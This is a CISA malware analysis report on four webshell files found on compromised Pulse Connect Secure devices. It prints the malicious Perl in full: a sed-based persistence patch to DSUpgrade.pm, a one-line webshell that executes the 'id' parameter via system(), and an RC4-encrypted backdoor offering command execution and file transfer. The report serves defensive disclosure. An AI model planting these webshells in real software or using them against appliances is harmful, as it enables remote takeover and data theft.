MAR-10333243-1.v1: Pulse Connect Secure

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Description

Four (4) files were submitted to CISA for analysis related to Pulse Secure Perl Common Gateway Interface (CGI) exploit. The files contain webshells or are designed to propagate shells that allow for remote code execution or unauthorized access. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of IOCs, see: MAR-10333243-1.v1WHITE.stix.

Submitted Files (4)

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85 (DSUpgrade.pm)

bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98 ( licenseserverproto.cgi )

d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a (licenseserverproto.cgi)

ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496 (healthcheck.cgi)

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85

Tags

trojanwebshell

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

Relationships

Description

The file contains malicious code that was patched into the Pulse Secure application.

--Begin Malicious Code--
my $cgi_p="/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi";
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");
system("cp -f /tmp/installer/do-install /pkg/");
system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
system("$cmd_x");
system("rm -rf /tmp/installer");
my $td = time - $ts;
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}

return $status == 0;
}
--End Malicious Code--

The patched in code will leverage the following SED command to patch a malicious webshell into the Pulse Secure system file “/pkg/do-install”:

--Begin Malicious SED Command--
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install"
--End Malicious SED Command--

The purpose of the webshell is to accept a parameter named "id" from within an incoming web application post, and also copy another instance of the shell into the parameter '$cgi_p', which resolves to the legitimate file 'licenseserverproto.cgi'. The webshell will then process the data provided within the "id" parameter as an operating system command by executing it locally utilizing the system() function.

d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a

Tags

webshell

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

Relationships

Description

This artifact is a Pulse Secure CGI application that has been modified with the following malicious webshell:

---Begin Malicious Webshell---
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
---End Malicious Webshell---

The webshell is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code will extract its contents and execute it on the target system using the system() function. If no "id" parameter is passed to the application the code will simply execute the main() function of the original Pulse Secure application.

ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496

Tags

webshell

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This artifact is a Pulse Secure CGI script that has been maliciously modified. The modification allows for remote command execution and uploads and downloads of encrypted files. The malicious code is displayed below. Analyst comments are in brackets []:

---Begin Malicious Code---
use MIME::Base64;
use Crypt::RC4;

my $ph="[REDACTED]"; [Hard coded RC4 key.]

sub r [Generates random bytes to be used in (sub a) for encryption.]
{
my $n=$_[0];
my $rs;
   for (my $i=0;$i<$n;$i++)
   {
   my $n1=int(rand(256));
   $rs.=chr($n1);
   }
return $rs;
}

sub a [RC4 encrypts a string that includes a random 6 byte key, RC4 key ($ph above), and the payload, then base64 encodes the string.]
{
my $st=$_[0];
my $k=r(6);
my $en = RC4( $k.$ph, $st);
return encode_base64($k.$en);
}

sub b [Base64 decodes a payload and then decodes using the above RC4 key ($ph) and 6 byte key.]
{
my $s= decode_base64($_[0]);
my $l=length($s);
my $k= substr($s,0,6);
my $en=substr($s,6,$l-6);
my $de = RC4( $k.$ph, $en );
return $de;
}

sub c [Downloads a file and uses the (sub b) function above to decrypt it, or uploads a file and uses the (sub a) function above to encrypt it.]

{
my $fi=CGI::param('img');
my $FN=b($fi);
my $fd;
print "Content-type: application/x-download\n";
open(*FILE, "<$FN" );
   while(<FILE>)
   {
    $fd=$fd.$_;
   }
close(*FILE);
print "Content-Disposition: attachment;
filename=tmp\n\n";
print a($fd);
}

sub d [Decrypts a file using the (sub b) function above and writes out the file.]
{
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $fi = CGI::param('cert');
$fi=b($fi);
my $pa=CGI::param('md5');
$pa=b($pa);
open (*outfile, ">$pa");
print outfile $fi;
close (*outfile);
}

sub e [Decrypts an incoming command and executes as system. If the command has the wrong parameter it returns "Error 404".]
{
print "Cache-Control: no-cache\n";
print "Content-type: image/gif\n\n";
my $na=CGI::param('name');
$na=b($na);my $rt;
   if (!$na or $na eq "cd")
   {
    $rt="Error 404";
   }
    else
   {
   my $ot="/tmp/1";
   system("$na >/tmp/1 2>&1");
   open(*cmd_result,"<$ot");
    while(<cmd_result>)
    {
       $rt=$rt.$_;
    }
   close(*cmd_result);
   unlink $ot} print a($rt);
}

sub f [Responses to POST requests.]
{
if(CGI::param('cert')) [If it receives a file it attempts to write it.]
{
   d();
}
elsif(CGI::param('img') and CGI::param('name')) [If it receives a command it attempts to execute it.]
{
   c();
}
elsif(CGI::param('name') and CGI::param('img') eq "") [If it is unable to execute the command it sends "Error 404".]
{
   e();
}
else # [Do normal processing.]
{
    &main();
}
}
if ($ENV{'REQUEST_METHOD'} eq "POST") [If its a POST request follow (sub f) function above.]
{
f();
}
else
{
&main(); [Do normal processing.]
}
---End Malicious Code---

The last part of this file contains modified code that renders a dialog box that allows for the searching of files to be downloaded. Before downloading, the files are RC4 encrypted and base64 encoded. The program uses the hard-coded key for the RC4 encryption.

bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98

Tags

webshell

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This artifact is a Pulse Secure CGI application that has been modified with the following malicious webshell:

---Begin Malicious Webshell---
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
---End Malicious Webshell---

The webshell is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code will extract its contents and execute it on the target system using the system() function. If no "id" parameter is passed to the application, the code will simply execute the main() function of the original Pulse Secure application.

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

• Maintain up-to-date antivirus signatures and engines.
• Keep operating system patches up-to-date.
• Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
• Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
• Enforce a strong password policy and implement regular password changes.
• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
• Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
• Disable unnecessary services on agency workstations and servers.
• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
• Monitor users' web browsing habits; restrict access to sites with unfavorable content.
• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
• Scan all software downloaded from the Internet prior to executing.
• Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

• 1-888-282-0870
• CISA Service Desk (UNCLASS)
• CISA SIPR (SIPRNET)
• CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

• Web: https://malware.us-cert.gov
• E-Mail: submit@malware.us-cert.gov
• FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.